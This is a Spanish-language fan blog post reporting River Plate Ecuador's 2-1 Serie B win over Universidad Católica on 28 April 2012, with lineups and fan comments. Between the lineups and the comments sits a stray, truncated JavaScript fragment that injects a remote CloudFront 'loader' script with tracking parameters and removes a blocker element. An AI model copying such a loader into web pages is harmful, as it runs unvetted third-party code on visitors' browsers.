Posteado por: elblogchatolei | abril 29, 2012

Trencito Azul no pudo remontar en el puerto: River Plate Ec. 2-1 U.Católica 28/04/2012

La tarde de este sábado 28, Universidad Católica visitó el estadio “La Fortaleza” de River Plate, por la décima fecha del Campeonato Ecuatoriano de Fútbol Serie B.

El marcador favoreció al equipo local por 2-1, anotaron para el equipo guayaquileño Zambrano y Soledispa y descontó para el “Trencito” Jonathan De La Cruz.

En el primer tiempo el dominio del partido tuvo un solo protagonista, este fue el equipo local que pudo controlar los tiempos y anotar cuando las oportunidades se dieron, es así como en los primeros 45 minutos los “De la Banda” anotaron tras gruesos errores de la defensa de “La Chatoleí”.

Los cambios en el segundo tiempo le permitieron a Católica profundizar mas en los ataques y lograr descontar tras fallar varias opciones de gol, el tiempo pasó y el tanto del empate no llegó, pese a que los dirigidos por Jorge Célico, llegaron en varias ocasiones al arco defendido por Alexis Tenorio.

Con este resultado U.Católica se mantiene en el segundo lugar con 17 puntos a la espera de los resultados de la jornada. Goles: River (Zambrano 23′ , Soledispa 25′) Universidad Católica (De La Cruz 68′)

Alineaciones: River Plate de Ecuador: Alexis Tenorio; José Casares, Juan Lara, Mauricio Hurtado, Klever Triviño; Leonardo Soledispa, Danny Cabezas, Diego Corozo, Emmanuel Serra; Hector Penayo y Jasson Zambrano.

Universidad Católica: Hernán Galindez; Alejandro Espinoza, Andres Mendoza, Yeri Valencia; Elvis Pata, Alexis Chala, Alexander Godoy, Facundo Martínez, Henry Pata; Diego Benitez y Paulo De La Cruz

// -1 ? ‘https’: ‘http’;
var ccm = document.createElement(‘script’); ccm.type = ‘text/javascript’; ccm.async = true;
ccm.src = http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;
var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ccm, s);

jQuery(‘#cblocker’).remove();
});
};
// ]]>

Anuncios

Responses

  1. estube en el partido , k mal k jugo el equipo pesima su defensa el jugador mendoza muyu falloso minimo y x lo menos nos hacian cinco goles en el primer tiempo , el arquero pesimo me puede decir k sucede con el jugador estupiñan k no juega la delantera es muy tibia , k lastima es un equipo muy livianito

  2. SE DIJO DESDE EL PRINCIPIO QUE ESTE EQUIPO NO TENIA GENTE DE PESO EN EL MEDIO CAMPO, LOS JÓVENES GANAN PARTIDOS, LOS DE EXPERIENCIA GANAN TÍTULOS, ESPERO QUE POR LO MENOS SEGAMOS GANANDO DE LOCALES, YA QUE DE VISITANTES CREO QUE SE OLVIDAN DE JUGAR AL FÚTBOL.

  3. Que pena saber que perdimos con el ultimo de la tabla, esperemos que esto no repercuta al final, verdaderamente, nuestra delantera se come muchos goles, eso lo vimos contra la Grecia, es verdad se goleo, pero hay que ver que ofrecio en ese partido el rival, lamentablemente los delanteros actuales no dan la talla para estar en la CHATO.

  4. Y que bueno saber que en Guayaquil si hay hinchas de nuestra querida CHATO, saludos a Luna y gracias por su informe.

  5. Ya es hora de que la dirigencia piense en construir un estadio propio. Pequeño, coqueto,con una muy buena cancha y buenas instalaciones, ya es muy vergonzoso estar buscando cancha para jugar cuando equipos como el Independiente de valle que no tiene nada de trascendencia en el futbol tienen su propio estadio. NADIE pide lujos pero si un estadio en donde se pueda jugar cuando al equipo le de la gana; hinchas apoyen esta mocion, yo se que es muy caro y toma mucho tiempo, pero hay que empezar ya mismo porque algun dia se nos va a negar el derecho de jugar en el Atahualpa.

  6. Haber amigos de la Cato, realmente no se que sucede cuando jugamos de visitantes, un solo punto hemos conseguido y ya va avanzando el campeonato, luego los equipos se hacen más fuertes y como tenemos un sistema que al final es durísmo, lo ideal sería obtener el primer puesto y bonificar, amerita un centrodelantero con oficio; por otro lado que será del zurdo López, que pasó?, se lo esta guardando hasta que este muy bien o se agravó la lesión, digannos algo.

    Por último, que duro escuchar que los “señores” del Aucas no quieren prestar la cancha, puesto que está en “mantenimiento”, vean esta gente siempre le tuvo bronca a la Cato y con otros directivos de los demás equipos de quito, quieren que la Chatoleí desaparezca, harán lo imposible por perjudicarle al equipo, por eso nada de que mi segundo equipo es el “aucas”, dejemonos de ridiculeses y que la Cato sea nuestro primero y único equipo, lo del estadio lo respaldo al 100%, sabemos que puede haber quienes financien, eso le haría bien hasta para el sector de la Armenia, lo malo es que el terreno no es propio y creo que es mal negocio hacer un estadio en tarreno ajeno.

    Donde quiera y como sea, la Cato sube porque sube contra todo y contra todos, ARRIBA LA CATO.

    Saludos,

    Byron López P.

    CAMARTTA POR SIEMPRE


Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Categorías

A %d blogueros les gusta esto: